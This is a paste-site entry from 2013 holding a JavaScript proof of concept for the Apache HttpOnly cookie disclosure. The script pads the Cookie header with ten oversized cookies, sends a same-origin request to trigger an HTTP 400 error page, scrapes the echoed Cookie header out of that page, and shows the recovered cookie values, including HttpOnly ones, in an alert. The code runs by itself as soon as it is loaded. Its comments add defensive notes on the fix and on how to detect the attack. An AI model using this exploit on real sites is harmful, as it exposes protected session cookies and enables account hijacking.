Apache httpOnly Cookie Disclosure


SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 9:18 p.m.


  1. // Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
  2. // Most browsers limit cookies to 4k characters, so we need multiple cookies to build an oversized Cookie header
  /**
   * Writes or clears the ten padding cookies "xss0".."xss9" used by this demo.
   *
   * Each cookie carries 819 "x" characters and is scoped to path "/", so all
   * ten are sent with every later request to the site and inflate its Cookie
   * header. Calling the function again with a truthy argument expires them.
   *
   * @param {boolean} [good] - truthy: expire the padding cookies;
   *                           falsy or omitted: set them.
   */
  function setCookies (good) {
    // 820 empty slots joined by "x" give exactly 819 characters of padding.
    var filler = new Array(820).join("x");
    var index = 0;
    while (index < 10) {
      var name = "xss" + index;
      // An expiry one millisecond in the past makes the browser drop the
      // cookie; otherwise the cookie is written with the padding value.
      document.cookie = good
        ? name + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;"
        : name + "=" + filler + ";path=/";
      index += 1;
    }
  }
  /**
   * Demonstrates that an HTTP 400 error page which echoes the request's
   * Cookie header makes cookies readable to script even when they are
   * flagged HttpOnly and therefore absent from document.cookie.
   *
   * Flow: pad the Cookie header with setCookies(), request "/" on the same
   * origin, and, if the server answers 400, read the header back out of the
   * <pre> element of the error body. The padding cookies are then expired
   * and the recovered name/value pairs are shown in an alert.
   *
   * Defensive notes: the request is same-origin, so this only matters where
   * script already runs inside the site's origin. The exposure disappears
   * when the server's 400 page does not reflect request headers (an updated
   * server, or a static custom ErrorDocument for status 400). Where request
   * headers are inspected, a set of cookies named xss0..xss9 followed by a
   * 400 response is a recognisable trace of this script.
   */
  function makeRequest() {
    // Inflate the Cookie header before the request goes out.
    setCookies();

    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function () {
      // Only a completed request that was answered with 400 is of interest.
      if (xhr.readyState !== 4 || xhr.status !== 400) {
        return;
      }
      var cookie_dict = {};
      // Flatten the body to one line so the <pre> match can span line breaks.
      var found = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
      // NOTE(review): match() returns null when the 400 body has no <pre>
      // element; the .length access then throws and the cleanup call below
      // is never reached, leaving the padding cookies in the browser.
      if (found.length) {
        // Drop the header name, then the padding cookies, keeping the rest.
        var header = found[1].replace("Cookie: ", "");
        var pairs = header.replace(/xss\d=x+;?/g, '').split(/;/g);
        pairs.forEach(function (pair) {
          var parts = pair.split('=', 2);
          cookie_dict[parts[0]] = parts[1];
        });
      }
      // Expire the padding cookies so later requests are accepted again.
      setCookies(true);
      alert(JSON.stringify(cookie_dict));
    };
    xhr.open("GET", "/", true);
    xhr.send(null);
  }
  // Entry point: runs the demonstration once, as soon as the script is loaded.
  51. makeRequest();
